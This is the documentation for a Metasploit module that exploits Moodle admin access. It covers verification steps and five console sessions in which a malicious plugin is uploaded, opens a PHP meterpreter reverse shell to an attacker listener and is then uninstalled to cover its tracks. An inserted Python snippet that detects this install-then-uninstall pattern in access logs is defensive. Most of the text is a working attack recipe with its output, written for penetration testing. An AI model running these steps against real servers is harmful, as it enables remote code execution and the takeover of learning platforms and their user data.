metasploit-gs/documentation/modules/exploit/multi/http/moodle_admin_shell_upload.md

Vulnerable Application

This module generates a plugin that can receive a malicious payload request and uploads it to a server running Moodle, provided valid admin credentials are used. The payload is then sent for execution, and the plugin is uninstalled.

You must have an admin account to exploit this vulnerability.

Successfully tested against Moodle 3.6.3, 3.8.0, 3.9.0, 3.10.0 and 3.11.2.
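
A defender-side check for the sequence described above (plugin uploaded, then uninstalled shortly afterwards), added here as an example that is not part of the module or its documentation: it scans web access logs for a POST to Moodle's web plugin installer followed by a plugin uninstall request from the same client within a short window. The endpoint paths, the combined log format, the 10-minute window and the sample lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Assumed Moodle admin endpoints for web-based plugin install and uninstall.
INSTALL = "/admin/tool/installaddon/index.php"
UNINSTALL = "/admin/plugins.php"
# Apache/nginx "combined" access-log prefix (assumed log format).
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

def parse(line):
    """Return (ip, time, method, path, query) or None for unparseable lines."""
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    path, _, query = m["url"].partition("?")
    return m["ip"], ts, m["method"], path, query

def find_install_then_uninstall(lines, window=timedelta(minutes=10)):
    """Flag clients that install a plugin and uninstall one within `window`."""
    last_install, hits = {}, []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, path, query = rec
        if method == "POST" and path.endswith(INSTALL):
            last_install[ip] = ts
        elif path.endswith(UNINSTALL) and "uninstall=" in query:
            started = last_install.pop(ip, None)
            if started is not None and ts - started <= window:
                hits.append((ip, started, ts))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up plugin names).
SAMPLE_LOG = [
    '198.51.100.7 - - [29/Aug/2021:09:00:00 -0400] "POST /moodle/admin/tool/installaddon/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [29/Aug/2021:11:30:00 -0400] "GET /moodle/admin/plugins.php?uninstall=block_old HTTP/1.1" 200 4096',
    '203.0.113.5 - - [29/Aug/2021:12:00:00 -0400] "GET /moodle/admin/plugins.php HTTP/1.1" 200 9000',
    '192.0.2.10 - - [29/Aug/2021:16:03:38 -0400] "POST /moodle/admin/tool/installaddon/index.php HTTP/1.1" 303 0',
    '192.0.2.10 - - [29/Aug/2021:16:03:41 -0400] "GET /moodle/admin/plugins.php?uninstall=block_example&confirm=1 HTTP/1.1" 303 0',
]

if __name__ == "__main__":
    for ip, start, end in find_install_then_uninstall(SAMPLE_LOG):
        print(f"{ip}: plugin installed {start} and uninstalled {(end - start).seconds}s later")
```

An install followed hours later by an uninstall (the first client in the sample) is ordinary administration and is not flagged; tune the window to the site's own change process.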

Verification Steps

  1. Install Moodle
  2. Start msfconsole
  3. Do: use exploits/multi/http/moodle_admin_shell_upload
  4. Do: set username [username]
  5. Do: set password [password]
  6. Do: run
  7. You should get a shell.

Options

Username

Username for an admin user. Default is admin.

Password

Password for an admin user.

Scenarios

Moodle 3.8.0 on Ubuntu 20.04

resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.8.0/
targeturi => /moodle-3.8.0/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.8 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Getting variables required for upload
[*] Creating plugin named: tqmdaefi
[*] Uploading plugin
[+] Plugin tqmdaefi.zip file successfully uploaded to target!
[*] Attempting to integrate the plugin...
[*] Integrating plugin
[+] Plugin successfully integrated!
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56156) at 2021-08-29 16:03:40 -0400
[*] Uninstalling plugin

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux

Moodle 3.6.3 on Ubuntu 20.04

resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.6.3/
targeturi => /moodle-3.6.3/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.6.3 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Getting variables required for upload
[*] Creating plugin named: ttvszmjy
[*] Uploading plugin
[+] Plugin ttvszmjy.zip file successfully uploaded to target!
[*] Attempting to integrate the plugin...
[*] Integrating plugin
[+] Plugin successfully integrated!
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56158) at 2021-08-29 16:09:49 -0400
[*] Uninstalling plugin

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux

Moodle 3.9.0 on Ubuntu 20.04

resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.9.0/
targeturi => /moodle-3.9.0/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.9 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Getting variables required for upload
[*] Creating plugin named: jwnsnjof
[*] Uploading plugin
[+] Plugin jwnsnjof.zip file successfully uploaded to target!
[*] Attempting to integrate the plugin...
[*] Integrating plugin
[+] Plugin successfully integrated!
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56182) at 2021-08-29 16:47:00 -0400
[*] Uninstalling plugin

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux

Moodle 3.10.0 on Ubuntu 20.04

resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.10.0/
targeturi => /moodle-3.10.0/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.10 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Getting variables required for upload
[*] Creating plugin named: xstassyj
[*] Uploading plugin
[+] Plugin xstassyj.zip file successfully uploaded to target!
[*] Attempting to integrate the plugin...
[*] Integrating plugin
[+] Plugin successfully integrated!
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56186) at 2021-08-29 16:49:52 -0400
[*] Uninstalling plugin

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux

Moodle 3.11.2 on Ubuntu 20.04

resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.11.2/
targeturi => /moodle-3.11.2/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.11.2 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Getting variables required for upload
[*] Creating plugin named: ksrhyfeq
[*] Uploading plugin
[+] Plugin ksrhyfeq.zip file successfully uploaded to target!
[*] Attempting to integrate the plugin...
[*] Integrating plugin
[+] Plugin successfully integrated!
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56190) at 2021-08-29 16:54:03 -0400
[*] Uninstalling plugin

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux